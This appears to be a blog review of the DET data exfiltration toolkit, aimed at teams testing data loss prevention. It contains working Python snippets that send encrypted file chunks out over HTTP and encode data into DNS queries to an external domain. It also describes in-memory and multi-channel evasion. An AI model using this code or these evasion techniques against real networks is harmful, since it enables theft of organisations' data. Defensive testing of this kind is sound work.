DET: Testing Data Loss Prevention by Thinking Like an Attacker

Hook

Your company's DLP solution blocks file uploads to Dropbox, but can it detect data leaving through DNS queries, Twitter DMs, and ICMP packets simultaneously? Most can't.

Context

Data Loss Prevention (DLP) systems have become increasingly sophisticated, monitoring network traffic for sensitive information leaving corporate environments. They excel at detecting obvious exfiltration attempts: large file uploads to cloud storage, email attachments containing credit card numbers, or USB drive transfers. Yet security teams face a fundamental challenge when validating these systems: they tend to think defensively, testing controls against known attack patterns rather than creative evasion techniques.

DET emerged from SensePost's offensive security practice to flip this paradigm. Rather than asking "what can our DLP detect," it forces the question "what happens when an attacker uses legitimate services like Gmail API calls, embeds data in DNS TXT records, or splits payloads across Twitter direct messages?" The toolkit provides a controlled laboratory for security teams to adopt an attacker's perspective, stress-testing their detection capabilities against multi-channel exfiltration scenarios that mirror real-world advanced persistent threats.

Technical Insight

[Figure: system architecture]

DET implements a client-server architecture where both components share a unified plugin system. The server initializes by loading plugins from a JSON configuration file, spawning listeners for each enabled channel. Meanwhile, the client chunks target files, encrypts payloads with AES-256, and simultaneously transmits across multiple protocols. This architecture enables scenarios where data exits through three or four channels at once, overwhelming single-vector detection systems.
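The first two steps of that flow, reading the enabled channels from JSON and chunking a file, can be sketched as follows. This is a minimal illustration, not DET's code: the config layout, the `plugins` and `chunk_size` keys, and the helper names are all assumptions made for the example.

```python
import json

# Hypothetical config layout for illustration only; DET's real schema may differ.
EXAMPLE_CONFIG = """
{
  "plugins": {
    "http": {"enabled": true, "target": "192.0.2.10", "port": 8080},
    "dns": {"enabled": true, "target": "exfil.example.com"},
    "icmp": {"enabled": false, "target": "192.0.2.10"}
  },
  "chunk_size": 4
}
"""

def enabled_plugins(config):
    """Return the names of plugins whose 'enabled' flag is set, sorted for stable output."""
    return sorted(name for name, opts in config["plugins"].items() if opts.get("enabled"))

def chunk_bytes(data, size):
    """Split data into consecutive chunks of at most `size` bytes."""
    return [data[i:i + size] for i in range(0, len(data), size)]

config = json.loads(EXAMPLE_CONFIG)
plugins = enabled_plugins(config)
chunks = chunk_bytes(b"test-data!", config["chunk_size"])
```

A real client would then encrypt each chunk and hand it to one of the enabled plugins; the tiny chunk size here only keeps the example readable.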

The plugin interface standardizes how each exfiltration channel operates. Every plugin must implement methods for initialization, data transmission, and cleanup. Here's a simplified example showing how the HTTP plugin structures outbound requests:

import zlib
import requests

class HTTPPlugin:
    def __init__(self, config):
        self.target = config['target']
        self.port = config['port']
        self.uri = config['uri']
        # Assumed config field holding the shared AES key
        self.key = config['key']

    def send_chunk(self, chunk_data, metadata):
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'X-Request-ID': str(metadata['chunk_id'])
        }
        # Compress before encrypting: ciphertext is effectively incompressible
        compressed = zlib.compress(chunk_data)
        # aes_encrypt is an assumed helper that is not defined in this snippet
        payload = aes_encrypt(compressed, self.key)

        response = requests.post(
            f'http://{self.target}:{self.port}{self.uri}',
            data=payload,
            headers=headers,
            timeout=10
        )
        return response.status_code == 200
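The three-part contract (initialization, transmission, cleanup) can be expressed as an abstract base class. The sketch below is an assumption about how such an interface might look, not DET's actual class hierarchy; `ExfilPlugin`, `LoopbackPlugin`, and the method names are hypothetical.

```python
from abc import ABC, abstractmethod

class ExfilPlugin(ABC):
    """Hypothetical base class; the method names are assumptions for illustration."""

    def __init__(self, config):
        self.config = config

    @abstractmethod
    def send_chunk(self, chunk_data, metadata):
        """Transmit one chunk and return True on success."""

    def cleanup(self):
        """Release sockets or sessions; nothing to do by default."""

class LoopbackPlugin(ExfilPlugin):
    """Test double that records chunks in memory instead of sending them."""

    def __init__(self, config):
        super().__init__(config)
        self.sent = []

    def send_chunk(self, chunk_data, metadata):
        self.sent.append((metadata["chunk_id"], chunk_data))
        return True

    def cleanup(self):
        self.sent.clear()

plugin = LoopbackPlugin({"name": "loopback"})
ok = plugin.send_chunk(b"abc", {"chunk_id": 0})
```

A loopback plugin like this is handy in a lab: it lets you exercise chunking and reassembly logic without generating any network traffic.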

The real innovation lies in how DET leverages legitimate services as exfiltration channels. The Gmail plugin, for instance, doesn't just send emails: it uses Gmail's API to create draft messages that are never sent, storing data in a semi-permanent location that looks like normal user behavior. Similarly, the Twitter plugin embeds Base64-encoded chunks in direct messages, a technique that blends with social media noise and can slip past perimeter controls that allow traffic to the service.
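To make the "Base64 chunks in messages" idea concrete, here is a minimal sketch of framing binary data as short text messages and recovering it on the other side. It does not call any messaging API. The `index:payload` framing and the `max_chars` limit are assumptions for illustration, not DET's wire format or any service's real limit.

```python
import base64

def to_messages(data, max_chars=200):
    """Encode data as Base64 and split it into 'index:payload' text messages.

    max_chars is a hypothetical per-message limit, not a real service limit.
    """
    encoded = base64.b64encode(data).decode("ascii")
    body = max_chars - 8  # reserve room for a numeric index and the ':' separator
    parts = [encoded[i:i + body] for i in range(0, len(encoded), body)]
    return [f"{i}:{part}" for i, part in enumerate(parts)]

def from_messages(messages):
    """Reorder messages by index and decode the original bytes."""
    pairs = (m.split(":", 1) for m in messages)
    ordered = sorted(pairs, key=lambda p: int(p[0]))
    return base64.b64decode("".join(part for _, part in ordered))

original = b"x" * 500
messages = to_messages(original, max_chars=100)
restored = from_messages(list(reversed(messages)))
```

The index prefix is what allows the receiver to tolerate messages arriving out of order.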

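DNS exfiltration demonstrates particularly clever encoding. The toolkit splits file data into subdomain labels, constructing queries like [chunk_data].target.com. Each label is limited to 63 characters and names are case-insensitive, so the data must be encoded accordingly. Since outbound DNS is typically allowed and often inspected less closely than web or email traffic, this creates a covert channel: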

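import base64
import dns.resolver  # dnspython 2.x

def dns_exfiltrate(chunk, target_domain, max_label_length=63):
    # Base32 survives case-insensitive DNS; strip '=' padding, which is not valid in a label
    encoded = base64.b32encode(chunk).decode('ascii').lower().rstrip('=')
    labels = [encoded[i:i+max_label_length]
              for i in range(0, len(encoded), max_label_length)]
    # Callers must keep chunks small enough that the full name stays within 253 characters
    fqdn = '.'.join(labels + [target_domain])
    dns.resolver.resolve(fqdn, 'A')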
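On the receiving side, the server has to reverse that encoding from the query name it observes. The following is a minimal sketch under the assumption that chunks are Base32-encoded with padding stripped; `encode_labels` and `decode_query_name` are hypothetical helpers, and the sketch performs no DNS traffic.

```python
import base64

def encode_labels(chunk, max_label_length=63):
    """Base32-encode a chunk, drop '=' padding, and split into DNS-sized labels."""
    encoded = base64.b32encode(chunk).decode("ascii").lower().rstrip("=")
    return [encoded[i:i + max_label_length]
            for i in range(0, len(encoded), max_label_length)]

def decode_query_name(fqdn, target_domain):
    """Recover the chunk bytes from a query name ending in target_domain."""
    suffix = "." + target_domain
    if not fqdn.endswith(suffix):
        raise ValueError("query is not for the exfiltration domain")
    encoded = fqdn[: -len(suffix)].replace(".", "").upper()
    # Restore the '=' padding that b32decode requires.
    encoded += "=" * (-len(encoded) % 8)
    return base64.b32decode(encoded)

name = ".".join(encode_labels(b"secret chunk") + ["exfil.example.com"])
recovered = decode_query_name(name, "exfil.example.com")
```

Because the decoder only needs the query name, it works from an authoritative name server's query log as well as from a live listener.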

The multi-channel capability deserves emphasis. DET's configuration allows several plugins to operate at once, meaning a 10 MB file might exit through DNS queries, ICMP echo request payloads, and Twitter DMs at the same time. Each channel receives different chunks, and the server reassembles them regardless of arrival order. This fragmentation defeats DLP systems that analyze individual channels in isolation: no single channel carries the whole file, and even if one channel is blocked, the chunks sent through the others still leave the network.
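The distribution and reassembly logic can be sketched in a few lines. This is an illustration under assumptions, not DET's scheduler: it assigns chunks round-robin (the real tool may pick channels differently), and the function names are hypothetical.

```python
import random

def assign_round_robin(chunks, channels):
    """Tag each chunk with its index and a channel, cycling through the channels."""
    return [(i, channels[i % len(channels)], chunk) for i, chunk in enumerate(chunks)]

def reassemble(received, total):
    """Rebuild the payload from (index, data) pairs in any order; None if incomplete."""
    by_index = dict(received)
    if len(by_index) < total:  # at least one chunk has not arrived yet
        return None
    return b"".join(by_index[i] for i in range(total))

chunks = [b"alpha-", b"bravo-", b"charlie-", b"delta"]
plan = assign_round_robin(chunks, ["dns", "icmp", "twitter"])

arrivals = [(index, data) for index, _channel, data in plan]
random.shuffle(arrivals)  # simulate out-of-order arrival across channels
payload = reassemble(arrivals, total=len(chunks))
```

Note that `reassemble` returns `None` while any chunk is missing, which is the condition a defender creates by blocking one channel when the sender does not retry elsewhere.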

For Windows environments without Python, DET includes PowerShell module variants. These aren't mere ports but reimplementations that leverage Windows-native capabilities like Invoke-WebRequest and .NET cryptography libraries. The PowerShell version can operate entirely in memory, never touching disk, which evades file-based detection mechanisms common in endpoint security tools.

Gotcha

DET ships with prominent warnings about its proof-of-concept status, and those warnings prove prescient. The repository hasn't seen significant updates since 2016, leaving several experimental plugins incomplete. The Skype and Tor modules exist in skeleton form but lack functional implementations. More problematically, the GitHub exfiltration plugin, which would create commits containing data chunks, never materialized despite roadmap mentions.

The toolkit's age shows in its detection evasion capabilities. Modern DLP and EDR solutions have evolved considerably since 2016, implementing behavioral analysis and machine learning models that identify anomalous patterns regardless of protocol. DET's traffic patterns, while diverse, follow predictable structures that contemporary detection systems can fingerprint. The roadmap mentioned integrating Cloakify for better obfuscation, but this never happened. Additionally, the primary repository has apparently moved to a different maintainer (PaulSec), suggesting this SensePost fork may represent abandoned code. Before using DET in any security assessment, verify whether newer forks address these gaps.
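As one example of the kind of structural fingerprint a defender can apply, encoded DNS labels tend to be both long and high in character entropy. The sketch below is a simple heuristic for illustration, not a description of any vendor's detection logic; the `min_length` and `min_entropy` thresholds are assumptions that would need tuning against real traffic.

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Bits per character of the character distribution in text."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def looks_encoded(fqdn, min_length=30, min_entropy=3.5):
    """Flag names whose longest label is both long and high-entropy.

    The thresholds are illustrative assumptions, not tuned values.
    """
    longest = max(fqdn.split("."), key=len)
    return len(longest) >= min_length and shannon_entropy(longest) >= min_entropy

benign = looks_encoded("www.example.com")
suspicious = looks_encoded("abcdefghijklmnopqrstuvwxyz234567.exfil.example.com")
repetitive = looks_encoded("a" * 40 + ".example.com")
```

Running a test tool against a heuristic like this is a quick way to see how recognizable its default traffic is.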

Verdict

Use if you're a security team building a DLP testing laboratory with controlled, non-sensitive data. DET excels at demonstrating how multi-channel exfiltration defeats single-vector detection, making it valuable for vendor evaluations or red team training scenarios. Its protocol diversity, especially the legitimate service channels, illustrates real attacker techniques worth defending against.

Skip if you need production-ready tooling, actively maintained software, or plan to use it with actual sensitive data (both ethically wrong and legally questionable). Also skip if your assessment requires modern obfuscation techniques or complete feature implementations: the 2016 vintage and incomplete experimental modules mean you're better served by alternatives like PyExfil or by building custom tools. Check the PaulSec fork for potentially more current development.
